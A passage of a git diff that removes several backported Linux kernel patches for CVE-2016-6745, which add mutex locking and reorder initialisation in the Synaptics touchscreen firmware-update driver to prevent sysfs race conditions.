-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto force_reflash_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto force_reflash_store_exit;
- 	}
- 	if (LOCKDOWN)
- 		fwu->do_lockdown = true;
-@@ -1812,16 +1848,18 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto force_reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+force_reflash_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+force_reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1832,9 +1870,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input & LOCKDOWN) {
-@@ -1844,7 +1885,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 
- 	if ((input != NORMAL) && (input != FORCE)) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input == FORCE)
-@@ -1855,16 +1896,18 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+reflash_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1875,26 +1918,31 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without loading image in manual way!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (fwu->rmi4_data->suspended == true) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot lockdown while device is in suspend\n");
--		return -EBUSY;
-+		retval = -EBUSY;
-+		goto lockdown_store_exit;
- 	}
- 
- 	retval = fwu_start_write_lockdown();
-@@ -1902,16 +1950,18 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to write lockdown block\n",
- 				__func__);
--		goto exit;
-+		goto lockdown_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+lockdown_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+lockdown_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1920,6 +1970,8 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- {
- 	unsigned int input = 0;
- 
-+	/* Takes fwu_sysfs_mutex in the deferred work function. */
-+
- 	if (sscanf(buf, "%u", &input) != 1)
- 		return -EINVAL;
- 
-@@ -1942,26 +1994,31 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without loading image in manual way!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (fwu->rmi4_data->suspended == true) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot write config while device is in suspend\n");
--		return -EBUSY;
-+		retval = -EBUSY;
-+		goto write_config_store_exit;
- 	}
- 
- 	retval = fwu_start_write_config();
-@@ -1969,14 +2026,16 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to write config\n",
- 				__func__);
--		goto exit;
-+		goto write_config_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+write_config_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
-+write_config_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1999,7 +2058,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev,
- 		return -EBUSY;
- 	}
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = fwu_do_read_config();
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to read config\n",
-@@ -2028,7 +2091,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev,
- 		return -EINVAL;
- 	}
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	fwu->config_area = config_area;
-+	mutex_unlock(&fwu_sysfs_mutex);
- 
- 	return count;
- }
-@@ -2039,10 +2105,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 	int retval;
- 	unsigned long size;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	retval = kstrtoul(buf, 10, &size);
- 	if (retval)
--		return retval;
-+		goto image_size_store_exit;
- 
- 	fwu->image_size = size;
- 	fwu->data_pos = 0;
-@@ -2053,10 +2121,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to alloc mem for image data\n",
- 				__func__);
--		return -ENOMEM;
-+		retval = -ENOMEM;
- 	}
- 
--	return count;
-+image_size_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_block_size_show(struct device *dev,
-@@ -2241,6 +2311,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work)
- 		container_of(to_delayed_work(work),
- 			struct synaptics_rmi4_fwu_handle, fwu_work);
- 
-+	mutex_lock(&fwu_sysfs_mutex);
-+
- 	if (fwu->fn_ptr->enable)
- 		fwu->fn_ptr->enable(fwu->rmi4_data, false);
- 
-@@ -2248,6 +2320,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work)
- 
- 	if (fwu->fn_ptr->enable)
- 		fwu->fn_ptr->enable(fwu->rmi4_data, true);
-+
-+	mutex_unlock(&fwu_sysfs_mutex);
- }
- 
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
-@@ -2338,7 +2412,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
- #endif
- 
--        retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
-+	retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
- 		dev_err(&rmi4_data->i2c_client->dev,
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch
deleted file mode 100644
index 3002fc01..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 8667cc5ed59b7a4b64d82d8014bead09bddb1f76 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 14 Sep 2016 19:28:37 -0700
-Subject: [PATCH] input: synaptics: defer sysfs creation during init
-
-sysfs entries are created which reference fwu->fwu_work.
-defer the creation of these sysfs entries until the end of the init
-function, after fwu->fwu_work has been initialized.
-
-Change-Id: I89bdf0088f98b4513d3f3c3c95ae967584dc5171
-Bug: 31252388
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx25/synaptics_dsx_fw_update.c      | 25 ++++++++++++++--------
- 1 file changed, 16 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 734baafa4cfa1..3edeaa22aa336 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -4131,13 +4131,20 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	fwu->do_lockdown = DO_LOCKDOWN;
- 	fwu->initialized = true;
- 
--	retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
-+#ifdef DO_STARTUP_FW_UPDATE
-+	fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
-+	INIT_WORK(&fwu->fwu_work, fwu_startup_fw_update_work);
-+	queue_work(fwu->fwu_workqueue,
-+			&fwu->fwu_work);
-+#endif
-+
-+        retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to create sysfs bin file\n",
- 				__func__);
--		goto exit_free_mem;
-+		goto exit_destroy_work;
- 	}
- 
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
-@@ -4152,13 +4159,6 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 		}
- 	}
- 
--#ifdef DO_STARTUP_FW_UPDATE
--	fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
--	INIT_WORK(&fwu->fwu_work, fwu_startup_fw_update_work);
--	queue_work(fwu->fwu_workqueue,
--			&fwu->fwu_work);
--#endif
--
- 	return 0;
- 
- exit_remove_attrs:
-@@ -4169,6 +4169,13 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
- 
-+exit_destroy_work:
-+#ifdef DO_STARTUP_FW_UPDATE
-+	cancel_work_sync(&fwu->fwu_work);
-+	flush_workqueue(fwu->fwu_workqueue);
-+	destroy_workqueue(fwu->fwu_workqueue);
-+#endif
-+
- exit_free_mem:
- 	kfree(fwu->image_name);
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch
deleted file mode 100644
index 3b798db7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch
+++ /dev/null
@@ -1,386 +0,0 @@
-From 19055017169363f176693c3e41ebdfc3c8e11ef4 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Thu, 15 Sep 2016 12:10:56 -0700
-Subject: [PATCH] input: touchscreen: synaptics: prevent sysfs races
-
-Concurrent sysfs calls can cause ugly race conditions.
-Return EBUSY on concurrent sysfs calls, and prevent sysfs calls
-during initial fw load.
-
-Change-Id: I5e295c4cd7c3ba4b998de5b75f9b631679e7c39f
-Signed-off-by: Andrew Chant <achant@google.com>
-Bug: 31252388
----
- .../synaptics_dsx25/synaptics_dsx_fw_update.c      | 138 +++++++++++++++------
- 1 file changed, 99 insertions(+), 39 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 3edeaa22aa336..908693bd26a43 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -20,6 +20,7 @@
- #include <linux/module.h>
- #include <linux/slab.h>
- #include <linux/interrupt.h>
-+#include <linux/mutex.h>
- #include <linux/delay.h>
- #include <linux/input.h>
- #include <linux/firmware.h>
-@@ -654,6 +655,7 @@ static struct device_attribute attrs[] = {
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(dsx_fwu_remove_complete);
-+DEFINE_MUTEX(fwu_sysfs_mutex);
- 
- static bool tp_2k_panel = false;
- /**
-@@ -3719,14 +3721,18 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
- {
--	int retval;
-+	ssize_t retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (count < fwu->config_size) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Not enough space (%zu bytes) in buffer\n",
- 				__func__, count);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto show_image_exit;
- 	}
- 
- 	retval = secure_memcpy(buf, count, fwu->read_config_buf,
-@@ -3735,43 +3741,56 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy config data\n",
- 				__func__);
--		return retval;
-+		goto show_image_exit;
- 	}
- 
--	return fwu->config_size;
-+	retval = fwu->config_size;
-+
-+show_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
- {
--	int retval;
-+	ssize_t retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	retval = secure_memcpy(&fwu->ext_data_source[fwu->data_pos],
- 			fwu->image_size - fwu->data_pos, buf, count, count);
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy image data\n",
- 				__func__);
--		return retval;
-+		goto store_image_exit;
- 	}
- 
- 	fwu->data_pos += count;
-+	retval = count;
- 
-+store_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return count;
- }
- 
- static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
- {
--	int retval;
-+	ssize_t retval;
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto recovery_store_exit;
- 	}
- 
- 	if (!fwu->in_ub_mode) {
-@@ -3779,28 +3798,32 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
- 				"%s: Not in microbootloader mode\n",
- 				__func__);
- 		retval = -EINVAL;
--		goto exit;
-+		goto recovery_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto recovery_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
-+	}
- 
- 	retval = fwu_start_recovery();
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to do recovery\n",
- 				__func__);
--		goto exit;
-+		goto recovery_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+recovery_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
-+recovery_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -3811,15 +3834,20 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto reflash_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
-+	}
- 
- 	if (input & LOCKDOWN) {
- 		fwu->do_lockdown = true;
-@@ -3828,7 +3856,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 
- 	if ((input != NORMAL) && (input != FORCE)) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input == FORCE)
-@@ -3839,17 +3867,19 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+reflash_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = DO_LOCKDOWN;
-+reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -3860,35 +3890,42 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto write_config_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
-+	}
- 
- 	retval = fwu_start_write_config();
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to write config\n",
- 				__func__);
--		goto exit;
-+		goto write_config_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+write_config_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
-+write_config_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -3905,7 +3942,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev,
- 	if (input != 1)
- 		return -EINVAL;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = fwu_do_read_config();
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to read config\n",
-@@ -3926,7 +3967,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev,
- 	if (retval)
- 		return retval;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	fwu->config_area = config_area;
-+	mutex_unlock(&fwu_sysfs_mutex);
- 
- 	return count;
- }
-@@ -3937,8 +3981,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- 	int retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = secure_memcpy(fwu->image_name, MAX_IMAGE_NAME_LEN,
- 			buf, count, count);
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy image file name\n",
-@@ -3952,7 +4000,7 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
- {
--	int retval;
-+	ssize_t retval;
- 	unsigned long size;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-@@ -3960,6 +4008,9 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 	if (retval)
- 		return retval;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	fwu->image_size = size;
- 	fwu->data_pos = 0;
- 
-@@ -3969,10 +4020,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to alloc mem for image data\n",
- 				__func__);
--		return -ENOMEM;
-+		retval = -ENOMEM;
-+	} else {
-+		retval = count;
- 	}
--
--	return count;
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_block_size_show(struct device *dev,
-@@ -4024,35 +4077,42 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto guest_code_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto guest_code_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto guest_code_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
-+	}
- 
- 	retval = fwu_start_write_guest_code();
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to write guest code\n",
- 				__func__);
--		goto exit;
-+		goto guest_code_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+guest_code_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
-+guest_code_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch
deleted file mode 100644
index b8e553b4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch
+++ /dev/null
@@ -1,401 +0,0 @@
-From f5c96a8c96615490b72357b1c0940196f7dde474 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 14 Sep 2016 14:12:13 -0700
-Subject: [PATCH] input: touchscreen: Synaptics: prevent sysfs races
-
-Concurrent sysfs calls can cause ugly race conditions.
-Return EBUSY on concurrent sysfs calls, and prevent sysfs calls
-during initial fw load.
-
-Change-Id: Iec3db7f3fe9d33104319fd3e2bbf1d70ba68221b
-Bug: 31252388
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx_fw_update.c                      | 133 +++++++++++++++------
- 1 file changed, 99 insertions(+), 34 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index 3887f79a97a08..af6f92553aa7e 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-@@ -35,6 +35,7 @@
- #include <linux/module.h>
- #include <linux/slab.h>
- #include <linux/interrupt.h>
-+#include <linux/mutex.h>
- #include <linux/delay.h>
- #include <linux/input.h>
- #include <linux/firmware.h>
-@@ -768,6 +769,8 @@ static struct device_attribute attrs[] = {
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(fwu_remove_complete);
-+DEFINE_MUTEX(fwu_sysfs_mutex);
-+
- #ifdef HTC_FEATURE
- static uint32_t syn_crc(uint16_t *data, uint32_t len)
- {
-@@ -5087,6 +5090,9 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- 	}
- #endif
- 
-+	/* Prevent sysfs operations during initial update. */
-+	mutex_lock(&fwu_sysfs_mutex);
-+
- #ifdef HTC_FEATURE
- 	wake_lock(&fwu->fwu_wake_lock);
- 	if (bdata->update_feature & SYNAPTICS_RMI4_UPDATE_IMAGE)
-@@ -5101,7 +5107,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- #else
- 	synaptics_fw_updater(NULL);
- #endif
--
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return;
- }
- #endif
-@@ -5113,11 +5119,15 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 	int retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (count < fwu->config_size) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Not enough space (%d bytes) in buffer\n",
- 				__func__, (unsigned int)count);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto show_image_exit;
- 	}
- 
- 	retval = secure_memcpy(buf, count, fwu->read_config_buf,
-@@ -5126,10 +5136,14 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy config data\n",
- 				__func__);
--		return retval;
-+		goto show_image_exit;
- 	}
- 
--	return fwu->config_size;
-+	retval = fwu->config_size;
-+
-+show_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_store_image(struct file *data_file,
-@@ -5139,18 +5153,24 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 	int retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	retval = secure_memcpy(&fwu->ext_data_source[fwu->data_pos],
- 			fwu->image_size - fwu->data_pos, buf, count, count);
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy image data\n",
- 				__func__);
--		return retval;
-+		goto store_image_exit;
- 	}
- 
- 	fwu->data_pos += count;
-+	retval = count;
- 
--	return count;
-+store_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
-@@ -5160,9 +5180,12 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto do_recovery_store_exit;
- 	}
- 
- 	if (!fwu->in_ub_mode) {
-@@ -5170,11 +5193,13 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
- 				"%s: Not in microbootloader mode\n",
- 				__func__);
- 		retval = -EINVAL;
--		goto exit;
-+		goto do_recovery_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto do_recovery_store_exit;
-+	}
- 	else
- 		fwu->image = fwu->ext_data_source;
- 
-@@ -5183,15 +5208,18 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to do recovery\n",
- 				__func__);
--		goto exit;
-+		goto free_data_source_recovery_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+free_data_source_recovery_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
